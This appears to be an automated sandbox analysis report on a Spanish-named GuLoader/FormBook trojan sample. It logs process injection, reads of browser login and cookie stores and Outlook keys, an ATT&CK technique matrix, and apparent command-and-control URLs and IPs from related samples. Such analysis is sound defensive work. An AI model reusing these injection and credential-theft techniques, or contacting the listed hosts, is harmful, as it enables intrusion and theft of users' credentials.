        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E2755 mov eax, dword ptr fs:[00000030h]2_2_348E2755
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E2755 mov eax, dword ptr fs:[00000030h]2_2_348E2755
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E2755 mov eax, dword ptr fs:[00000030h]2_2_348E2755
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E2755 mov ecx, dword ptr fs:[00000030h]2_2_348E2755
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E2755 mov eax, dword ptr fs:[00000030h]2_2_348E2755
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E2755 mov eax, dword ptr fs:[00000030h]2_2_348E2755
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D2760 mov ecx, dword ptr fs:[00000030h]2_2_348D2760
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901763 mov eax, dword ptr fs:[00000030h]2_2_34901763
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901763 mov eax, dword ptr fs:[00000030h]2_2_34901763
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901763 mov eax, dword ptr fs:[00000030h]2_2_34901763
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901763 mov eax, dword ptr fs:[00000030h]2_2_34901763
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901763 mov eax, dword ptr fs:[00000030h]2_2_34901763
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901763 mov eax, dword ptr fs:[00000030h]2_2_34901763
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C4779 mov eax, dword ptr fs:[00000030h]2_2_348C4779
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C4779 mov eax, dword ptr fs:[00000030h]2_2_348C4779
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F0774 mov eax, dword ptr fs:[00000030h]2_2_348F0774
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BA093 mov ecx, dword ptr fs:[00000030h]2_2_348BA093
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34994080 mov eax, dword ptr fs:[00000030h]2_2_34994080
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34994080 mov eax, dword ptr fs:[00000030h]2_2_34994080
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34994080 mov eax, dword ptr fs:[00000030h]2_2_34994080
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34994080 mov eax, dword ptr fs:[00000030h]2_2_34994080
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34994080 mov eax, dword ptr fs:[00000030h]2_2_34994080
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34994080 mov eax, dword ptr fs:[00000030h]2_2_34994080
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34994080 mov eax, dword ptr fs:[00000030h]2_2_34994080
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BC090 mov eax, dword ptr fs:[00000030h]2_2_348BC090
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349950B7 mov eax, dword ptr fs:[00000030h]2_2_349950B7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F0A5 mov eax, dword ptr fs:[00000030h]2_2_3496F0A5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F0A5 mov eax, dword ptr fs:[00000030h]2_2_3496F0A5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F0A5 mov eax, dword ptr fs:[00000030h]2_2_3496F0A5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F0A5 mov eax, dword ptr fs:[00000030h]2_2_3496F0A5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F0A5 mov eax, dword ptr fs:[00000030h]2_2_3496F0A5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F0A5 mov eax, dword ptr fs:[00000030h]2_2_3496F0A5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F0A5 mov eax, dword ptr fs:[00000030h]2_2_3496F0A5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349000A5 mov eax, dword ptr fs:[00000030h]2_2_349000A5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497B0AF mov eax, dword ptr fs:[00000030h]2_2_3497B0AF
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DB0D0 mov eax, dword ptr fs:[00000030h]2_2_348DB0D0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB0D6 mov eax, dword ptr fs:[00000030h]2_2_348BB0D6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB0D6 mov eax, dword ptr fs:[00000030h]2_2_348BB0D6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB0D6 mov eax, dword ptr fs:[00000030h]2_2_348BB0D6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB0D6 mov eax, dword ptr fs:[00000030h]2_2_348BB0D6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B90F8 mov eax, dword ptr fs:[00000030h]2_2_348B90F8
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B90F8 mov eax, dword ptr fs:[00000030h]2_2_348B90F8
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B90F8 mov eax, dword ptr fs:[00000030h]2_2_348B90F8
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B90F8 mov eax, dword ptr fs:[00000030h]2_2_348B90F8
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BC0F6 mov eax, dword ptr fs:[00000030h]2_2_348BC0F6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FD0F0 mov eax, dword ptr fs:[00000030h]2_2_348FD0F0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FD0F0 mov ecx, dword ptr fs:[00000030h]2_2_348FD0F0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C8009 mov eax, dword ptr fs:[00000030h]2_2_348C8009
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E5004 mov eax, dword ptr fs:[00000030h]2_2_348E5004
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E5004 mov ecx, dword ptr fs:[00000030h]2_2_348E5004
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BD02D mov eax, dword ptr fs:[00000030h]2_2_348BD02D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3499505B mov eax, dword ptr fs:[00000030h]2_2_3499505B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F0044 mov eax, dword ptr fs:[00000030h]2_2_348F0044
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C1051 mov eax, dword ptr fs:[00000030h]2_2_348C1051
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C1051 mov eax, dword ptr fs:[00000030h]2_2_348C1051
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34969060 mov eax, dword ptr fs:[00000030h]2_2_34969060
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C6074 mov eax, dword ptr fs:[00000030h]2_2_348C6074
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C6074 mov eax, dword ptr fs:[00000030h]2_2_348C6074
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C7072 mov eax, dword ptr fs:[00000030h]2_2_348C7072
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901190 mov eax, dword ptr fs:[00000030h]2_2_34901190
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901190 mov eax, dword ptr fs:[00000030h]2_2_34901190
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C4180 mov eax, dword ptr fs:[00000030h]2_2_348C4180
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C4180 mov eax, dword ptr fs:[00000030h]2_2_348C4180
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C4180 mov eax, dword ptr fs:[00000030h]2_2_348C4180
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E9194 mov eax, dword ptr fs:[00000030h]2_2_348E9194
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FE1A4 mov eax, dword ptr fs:[00000030h]2_2_348FE1A4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FE1A4 mov eax, dword ptr fs:[00000030h]2_2_348FE1A4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349951B6 mov eax, dword ptr fs:[00000030h]2_2_349951B6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F31BE mov eax, dword ptr fs:[00000030h]2_2_348F31BE
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F31BE mov eax, dword ptr fs:[00000030h]2_2_348F31BE
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F41BB mov ecx, dword ptr fs:[00000030h]2_2_348F41BB
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F41BB mov eax, dword ptr fs:[00000030h]2_2_348F41BB
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F41BB mov eax, dword ptr fs:[00000030h]2_2_348F41BB
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D01C0 mov eax, dword ptr fs:[00000030h]2_2_348D01C0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D01C0 mov eax, dword ptr fs:[00000030h]2_2_348D01C0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D51C0 mov eax, dword ptr fs:[00000030h]2_2_348D51C0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D51C0 mov eax, dword ptr fs:[00000030h]2_2_348D51C0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D51C0 mov eax, dword ptr fs:[00000030h]2_2_348D51C0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D51C0 mov eax, dword ptr fs:[00000030h]2_2_348D51C0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B81EB mov eax, dword ptr fs:[00000030h]2_2_348B81EB
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C91E5 mov eax, dword ptr fs:[00000030h]2_2_348C91E5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C91E5 mov eax, dword ptr fs:[00000030h]2_2_348C91E5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EB1E0 mov eax, dword ptr fs:[00000030h]2_2_348EB1E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EB1E0 mov eax, dword ptr fs:[00000030h]2_2_348EB1E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EB1E0 mov eax, dword ptr fs:[00000030h]2_2_348EB1E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EB1E0 mov eax, dword ptr fs:[00000030h]2_2_348EB1E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EB1E0 mov eax, dword ptr fs:[00000030h]2_2_348EB1E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EB1E0 mov eax, dword ptr fs:[00000030h]2_2_348EB1E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EB1E0 mov eax, dword ptr fs:[00000030h]2_2_348EB1E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CA1E3 mov eax, dword ptr fs:[00000030h]2_2_348CA1E3
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CA1E3 mov eax, dword ptr fs:[00000030h]2_2_348CA1E3
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CA1E3 mov eax, dword ptr fs:[00000030h]2_2_348CA1E3
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CA1E3 mov eax, dword ptr fs:[00000030h]2_2_348CA1E3
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CA1E3 mov eax, dword ptr fs:[00000030h]2_2_348CA1E3
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349881EE mov eax, dword ptr fs:[00000030h]2_2_349881EE
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349881EE mov eax, dword ptr fs:[00000030h]2_2_349881EE
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B91F0 mov eax, dword ptr fs:[00000030h]2_2_348B91F0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B91F0 mov eax, dword ptr fs:[00000030h]2_2_348B91F0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D01F1 mov eax, dword ptr fs:[00000030h]2_2_348D01F1
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D01F1 mov eax, dword ptr fs:[00000030h]2_2_348D01F1
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D01F1 mov eax, dword ptr fs:[00000030h]2_2_348D01F1
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EF1F0 mov eax, dword ptr fs:[00000030h]2_2_348EF1F0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EF1F0 mov eax, dword ptr fs:[00000030h]2_2_348EF1F0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E510F mov eax, dword ptr fs:[00000030h]2_2_348E510F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E510F mov eax, dword ptr fs:[00000030h]2_2_348E510F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E510F mov eax, dword ptr fs:[00000030h]2_2_348E510F

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\SysWOW64\rasautou.exe | Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF7A9000000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\cuenta para pago1.exe | Section loaded: NULL target: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\cuenta para pago1.exe | Section loaded: NULL target: C:\Windows\SysWOW64\rasautou.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: NULL target: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe protection: read write
        Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: NULL target: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\rasautou.exe | Thread APC queued: target process: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
        Source: C:\Windows\SysWOW64\rasautou.exe | Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF7A9000000
        Source: C:\Users\user\Desktop\cuenta para pago1.exe | Process created: C:\Users\user\Desktop\cuenta para pago1.exe C:\Users\user\Desktop\cuenta para pago1.exe
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe | Process created: C:\Windows\SysWOW64\rasautou.exe C:\Windows\SysWOW64\rasautou.exe
        Source: C:\Windows\SysWOW64\rasautou.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\cuenta para pago1.exe | Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.8752999026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.8751671842.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.4216278898.0000000034BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.8751957709.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\rasautou.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match | File source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.8752999026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.8751671842.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.4216278898.0000000034BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.8751957709.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
        Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 411 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 411 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Clipboard Data | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 4 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

        [Behavior graph] Behavior Graph ID: 1410998, Sample: cuenta para pago1.exe, Startdate: 18/03/2024, Architecture: WINDOWS, Score: 100

        Source | Detection | Scanner | Label | Link
        cuenta para pago1.exe | 100% | Avira | HEUR/AGEN.1361137 |
        cuenta para pago1.exe | 47% | ReversingLabs | Win32.Trojan.Guloader |

        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll | 0% | ReversingLabs | |
        No Antivirus matches
        No Antivirus matches
                                                        unknown
                                                        unknowntrue
                                                          unknown
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1410998
Start date and time: 2024-03-18 15:04:16 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 17m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: cuenta para pago1.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/10@30/15
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 59
• Number of non-executed functions: 256
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, VSSVC.exe, svchost.exe
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: cuenta para pago1.exe
Time: 15:07:41, Type: API Interceptor, Description: 26777253x Sleep call for process: rasautou.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  194.191.24.38rcuentaparapago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/?Tnn=Sxv4&1T=bbTJsjbns1egJ9JAh959MNYhMlBhishDkV02q5vokHm6S8Qgk9c4A4/rVALt8kpaWPL/RyZRbRAxNoIAik6Ahn7XchDP755TKRWw9+PVZyBlhOQ45aXm/eU=
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  Transferencia de pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  factura pendiente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  factura-022899.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  factura-022853.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  factura-022853.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  factura pendiente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  Recibo de transferenc#U00eda.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  84.32.84.32Grundforbedre39.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.meliorras.com/m9so/
                                                                  iU3WGoA77BdiFdA.exeGet hashmaliciousFormBookBrowse
                                                                  • www.adilosk.shop/ns03/?t8o4n4P=AosJMqNKd7Rtr+7kStuqowEH7RbQp+KK2+r79Yxxw0f1QGTDBq2FkLKgkhN5vuWLBRjLKeslyQ==&jPm0=Klh8
                                                                  PO-31789R3WY-10_docx.exeGet hashmaliciousFormBookBrowse
                                                                  • www.gksscje.online/m21s/?v4=Cj6PF&9rIpdJQP=/lLSHdmLeiMPDetofN7Z6lDaWKdSDRGfvhAIJ/vGN+OAihoy/KUQLgQrGoqNPq2feNZ5
                                                                  PO663636.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • www.adilosk.shop/hy07/?CPp=gdoXZHeHF&pFQP-nBH=DfzpuJ12s8Tt+Vq+x1MvLRXRdzfgRVDyy0IoVhzBehBHNITUvhzHBr0ZFKm70P49LC8Pdrq2bg==
                                                                  9nncBfTB8Kjm7ge.exeGet hashmaliciousFormBook, PureLog StealerBrowse
